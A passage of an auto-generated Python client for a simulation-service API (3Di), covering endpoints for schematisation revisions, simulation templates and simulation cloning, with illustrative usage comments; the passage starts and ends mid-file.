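# Usage sketch (illustrative only): a full PUT replaces the resource, so
# `data` should carry a complete RevisionTask payload (field names are in the
# generated RevisionTask model), unlike the partial PATCH above.
#
#   task = api.schematisations_revisions_tasks_update(
#       id=42, revision_pk="7", schematisation_pk="3", data=full_body)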
def schematisations_revisions_threedimodels(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_threedimodels # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_threedimodels(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[ThreediModel]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_threedimodels_with_http_info(id, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_threedimodels_with_http_info(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_threedimodels # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_threedimodels_with_http_info(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[ThreediModel], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_threedimodels" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_threedimodels`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_threedimodels`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/threedimodels/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ThreediModel]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
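# Usage sketch (illustrative only): listing the 3Di models generated from a
# schematisation revision. Note that `id` here identifies the revision, not
# a model; the endpoint returns a plain list[ThreediModel].
#
#   models = api.schematisations_revisions_threedimodels(
#       id=7, schematisation_pk="3")
#   for model in models:
#       print(model)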
def schematisations_update(self, id, data, **kwargs): # noqa: E501
"""schematisations_update # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_update(id, data, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param Schematisation data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Schematisation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_update_with_http_info(id, data, **kwargs) # noqa: E501
def schematisations_update_with_http_info(self, id, data, **kwargs): # noqa: E501
"""schematisations_update # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_update_with_http_info(id, data, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param Schematisation data: (required)
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Schematisation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Schematisation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
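# Usage sketch (illustrative only): replacing a schematisation with a PUT.
# The Schematisation field shown is hypothetical; consult the generated
# Schematisation model for the real field names.
#
#   body = Schematisation(name="my-schematisation")  # hypothetical field
#   schematisation = api.schematisations_update(id=3, data=body)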
def simulation_templates_create(self, data, **kwargs): # noqa: E501
"""Create a (optionally cloned) simulation template from the given simulation. # noqa: E501
A simulation template is actually nothing more than a simulation with a special status. It's immutable after creation and only can be used to create new simulations. Simulations 'upgraded' to simulations templates can't be directly run. The 'from_template' endpoint allows to create a new simulation from a template in a runnable state. A simulation template can be changed by first creating a simulation from it with 'from_template'. Changing that simulation and use this endpoint to 'upgrade' it to a simulation template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_create(data, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param CreateTemplate data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Template
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulation_templates_create_with_http_info(data, **kwargs) # noqa: E501
def simulation_templates_create_with_http_info(self, data, **kwargs): # noqa: E501
"""Create a (optionally cloned) simulation template from the given simulation. # noqa: E501
A simulation template is actually nothing more than a simulation with a special status. It's immutable after creation and only can be used to create new simulations. Simulations 'upgraded' to simulations templates can't be directly run. The 'from_template' endpoint allows to create a new simulation from a template in a runnable state. A simulation template can be changed by first creating a simulation from it with 'from_template'. Changing that simulation and use this endpoint to 'upgrade' it to a simulation template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_create_with_http_info(data, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param CreateTemplate data: (required)
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Template, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulation_templates_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `simulation_templates_create`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulation_templates/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Template', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
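# Usage sketch (illustrative only): 'upgrading' a simulation to a template.
# The CreateTemplate constructor fields below are hypothetical; consult the
# generated CreateTemplate model for the real ones.
#
#   body = CreateTemplate(simulation=123, name="weekly-forecast")  # hypothetical fields
#   template = api.simulation_templates_create(data=body)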
def simulation_templates_delete(self, id, **kwargs): # noqa: E501
"""simulation_templates_delete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_delete(id, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this template. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulation_templates_delete_with_http_info(id, **kwargs) # noqa: E501
def simulation_templates_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""simulation_templates_delete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this template. (required)
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulation_templates_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `simulation_templates_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulation_templates/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
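# Usage sketch (illustrative only): deleting a template by id. Returns None
# on success; pass async_req=True to get a thread instead.
#
#   api.simulation_templates_delete(id=11)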
def simulation_templates_list(self, **kwargs): # noqa: E501
"""simulation_templates_list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_list(async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param str name:
:param str name__iexact:
:param str name__contains:
:param str name__icontains:
:param str name__in: Multiple values may be separated by commas.
:param str name__startswith:
:param str name__istartswith:
:param str name__endswith:
:param str name__regex:
:param str uuid:
:param str uuid__iexact:
:param str uuid__contains:
:param str uuid__icontains:
:param str uuid__in: Multiple values may be separated by commas.
:param str uuid__startswith:
:param str uuid__istartswith:
:param str uuid__endswith:
:param str uuid__regex:
:param str created__date:
:param str created__date__gt:
:param str created__date__gte:
:param str created__date__lt:
:param str created__date__lte:
:param float created__year:
:param float created__year__gt:
:param float created__year__gte:
:param float created__year__lt:
:param float created__year__lte:
:param float created__month:
:param float created__month__lte:
:param float created__day:
:param float created__day__lt:
:param float simulation__threedimodel__id:
:param float simulation__threedimodel__id__range: Multiple values may be separated by commas.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2004
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulation_templates_list_with_http_info(**kwargs) # noqa: E501
def simulation_templates_list_with_http_info(self, **kwargs): # noqa: E501
"""simulation_templates_list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_list_with_http_info(async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param str name:
:param str name__iexact:
:param str name__contains:
:param str name__icontains:
:param str name__in: Multiple values may be separated by commas.
:param str name__startswith:
:param str name__istartswith:
:param str name__endswith:
:param str name__regex:
:param str uuid:
:param str uuid__iexact:
:param str uuid__contains:
:param str uuid__icontains:
:param str uuid__in: Multiple values may be separated by commas.
:param str uuid__startswith:
:param str uuid__istartswith:
:param str uuid__endswith:
:param str uuid__regex:
:param str created__date:
:param str created__date__gt:
:param str created__date__gte:
:param str created__date__lt:
:param str created__date__lte:
:param float created__year:
:param float created__year__gt:
:param float created__year__gte:
:param float created__year__lt:
:param float created__year__lte:
:param float created__month:
:param float created__month__lte:
:param float created__day:
:param float created__day__lt:
:param float simulation__threedimodel__id:
:param float simulation__threedimodel__id__range: Multiple values may be separated by commas.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2004, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'name__iexact',
'name__contains',
'name__icontains',
'name__in',
'name__startswith',
'name__istartswith',
'name__endswith',
'name__regex',
'uuid',
'uuid__iexact',
'uuid__contains',
'uuid__icontains',
'uuid__in',
'uuid__startswith',
'uuid__istartswith',
'uuid__endswith',
'uuid__regex',
'created__date',
'created__date__gt',
'created__date__gte',
'created__date__lt',
'created__date__lte',
'created__year',
'created__year__gt',
'created__year__gte',
'created__year__lt',
'created__year__lte',
'created__month',
'created__month__lte',
'created__day',
'created__day__lt',
'simulation__threedimodel__id',
'simulation__threedimodel__id__range',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulation_templates_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'name__iexact' in local_var_params and local_var_params['name__iexact'] is not None: # noqa: E501
query_params.append(('name__iexact', local_var_params['name__iexact'])) # noqa: E501
if 'name__contains' in local_var_params and local_var_params['name__contains'] is not None: # noqa: E501
query_params.append(('name__contains', local_var_params['name__contains'])) # noqa: E501
if 'name__icontains' in local_var_params and local_var_params['name__icontains'] is not None: # noqa: E501
query_params.append(('name__icontains', local_var_params['name__icontains'])) # noqa: E501
if 'name__in' in local_var_params and local_var_params['name__in'] is not None: # noqa: E501
query_params.append(('name__in', local_var_params['name__in'])) # noqa: E501
if 'name__startswith' in local_var_params and local_var_params['name__startswith'] is not None: # noqa: E501
query_params.append(('name__startswith', local_var_params['name__startswith'])) # noqa: E501
if 'name__istartswith' in local_var_params and local_var_params['name__istartswith'] is not None: # noqa: E501
query_params.append(('name__istartswith', local_var_params['name__istartswith'])) # noqa: E501
if 'name__endswith' in local_var_params and local_var_params['name__endswith'] is not None: # noqa: E501
query_params.append(('name__endswith', local_var_params['name__endswith'])) # noqa: E501
if 'name__regex' in local_var_params and local_var_params['name__regex'] is not None: # noqa: E501
query_params.append(('name__regex', local_var_params['name__regex'])) # noqa: E501
if 'uuid' in local_var_params and local_var_params['uuid'] is not None: # noqa: E501
query_params.append(('uuid', local_var_params['uuid'])) # noqa: E501
if 'uuid__iexact' in local_var_params and local_var_params['uuid__iexact'] is not None: # noqa: E501
query_params.append(('uuid__iexact', local_var_params['uuid__iexact'])) # noqa: E501
if 'uuid__contains' in local_var_params and local_var_params['uuid__contains'] is not None: # noqa: E501
query_params.append(('uuid__contains', local_var_params['uuid__contains'])) # noqa: E501
if 'uuid__icontains' in local_var_params and local_var_params['uuid__icontains'] is not None: # noqa: E501
query_params.append(('uuid__icontains', local_var_params['uuid__icontains'])) # noqa: E501
if 'uuid__in' in local_var_params and local_var_params['uuid__in'] is not None: # noqa: E501
query_params.append(('uuid__in', local_var_params['uuid__in'])) # noqa: E501
if 'uuid__startswith' in local_var_params and local_var_params['uuid__startswith'] is not None: # noqa: E501
query_params.append(('uuid__startswith', local_var_params['uuid__startswith'])) # noqa: E501
if 'uuid__istartswith' in local_var_params and local_var_params['uuid__istartswith'] is not None: # noqa: E501
query_params.append(('uuid__istartswith', local_var_params['uuid__istartswith'])) # noqa: E501
if 'uuid__endswith' in local_var_params and local_var_params['uuid__endswith'] is not None: # noqa: E501
query_params.append(('uuid__endswith', local_var_params['uuid__endswith'])) # noqa: E501
if 'uuid__regex' in local_var_params and local_var_params['uuid__regex'] is not None: # noqa: E501
query_params.append(('uuid__regex', local_var_params['uuid__regex'])) # noqa: E501
if 'created__date' in local_var_params and local_var_params['created__date'] is not None: # noqa: E501
query_params.append(('created__date', local_var_params['created__date'])) # noqa: E501
if 'created__date__gt' in local_var_params and local_var_params['created__date__gt'] is not None: # noqa: E501
query_params.append(('created__date__gt', local_var_params['created__date__gt'])) # noqa: E501
if 'created__date__gte' in local_var_params and local_var_params['created__date__gte'] is not None: # noqa: E501
query_params.append(('created__date__gte', local_var_params['created__date__gte'])) # noqa: E501
if 'created__date__lt' in local_var_params and local_var_params['created__date__lt'] is not None: # noqa: E501
query_params.append(('created__date__lt', local_var_params['created__date__lt'])) # noqa: E501
if 'created__date__lte' in local_var_params and local_var_params['created__date__lte'] is not None: # noqa: E501
query_params.append(('created__date__lte', local_var_params['created__date__lte'])) # noqa: E501
if 'created__year' in local_var_params and local_var_params['created__year'] is not None: # noqa: E501
query_params.append(('created__year', local_var_params['created__year'])) # noqa: E501
if 'created__year__gt' in local_var_params and local_var_params['created__year__gt'] is not None: # noqa: E501
query_params.append(('created__year__gt', local_var_params['created__year__gt'])) # noqa: E501
if 'created__year__gte' in local_var_params and local_var_params['created__year__gte'] is not None: # noqa: E501
query_params.append(('created__year__gte', local_var_params['created__year__gte'])) # noqa: E501
if 'created__year__lt' in local_var_params and local_var_params['created__year__lt'] is not None: # noqa: E501
query_params.append(('created__year__lt', local_var_params['created__year__lt'])) # noqa: E501
if 'created__year__lte' in local_var_params and local_var_params['created__year__lte'] is not None: # noqa: E501
query_params.append(('created__year__lte', local_var_params['created__year__lte'])) # noqa: E501
if 'created__month' in local_var_params and local_var_params['created__month'] is not None: # noqa: E501
query_params.append(('created__month', local_var_params['created__month'])) # noqa: E501
if 'created__month__lte' in local_var_params and local_var_params['created__month__lte'] is not None: # noqa: E501
query_params.append(('created__month__lte', local_var_params['created__month__lte'])) # noqa: E501
if 'created__day' in local_var_params and local_var_params['created__day'] is not None: # noqa: E501
query_params.append(('created__day', local_var_params['created__day'])) # noqa: E501
if 'created__day__lt' in local_var_params and local_var_params['created__day__lt'] is not None: # noqa: E501
query_params.append(('created__day__lt', local_var_params['created__day__lt'])) # noqa: E501
if 'simulation__threedimodel__id' in local_var_params and local_var_params['simulation__threedimodel__id'] is not None: # noqa: E501
query_params.append(('simulation__threedimodel__id', local_var_params['simulation__threedimodel__id'])) # noqa: E501
if 'simulation__threedimodel__id__range' in local_var_params and local_var_params['simulation__threedimodel__id__range'] is not None: # noqa: E501
query_params.append(('simulation__threedimodel__id__range', local_var_params['simulation__threedimodel__id__range'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulation_templates/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2004', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
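# Usage sketch (illustrative only): the list endpoint accepts Django-style
# filter lookups as keyword arguments, plus limit/offset pagination. The
# `results` attribute on the paginated InlineResponse2004 is an assumption
# based on the usual generated pagination models.
#
#   page = api.simulation_templates_list(
#       name__icontains="forecast",
#       created__year=2021,
#       limit=25, offset=0)
#   for template in page.results:
#       print(template)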
def simulation_templates_read(self, id, **kwargs): # noqa: E501
"""simulation_templates_read # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_read(id, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this template. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Template
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulation_templates_read_with_http_info(id, **kwargs) # noqa: E501
def simulation_templates_read_with_http_info(self, id, **kwargs): # noqa: E501
"""simulation_templates_read # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_read_with_http_info(id, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this template. (required)
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Template, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulation_templates_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `simulation_templates_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulation_templates/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Template', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
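    # Hedged usage sketch (comments only, not part of the generated client).
    # `api` is assumed to be an instance of this generated API class, wired
    # to an authenticated ApiClient:
    #
    #   template = api.simulation_templates_read(42)             # synchronous
    #   thread = api.simulation_templates_read(42, async_req=True)
    #   template = thread.get()                                  # asynchronous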
def simulations_clone(self, id, **kwargs): # noqa: E501
"""Clone the simulation. # noqa: E501
Clones the simulation into a runnable state, copying only its events & initials. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulations_clone(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this simulation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Simulation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulations_clone_with_http_info(id, **kwargs) # noqa: E501
def simulations_clone_with_http_info(self, id, **kwargs): # noqa: E501
"""Clone the simulation. # noqa: E501
Clones the simulation into a runnable state, copying only its events & initials. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulations_clone_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this simulation. (required)
:param _return_http_data_only: return the response data only, without
                                status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Simulation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulations_clone" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
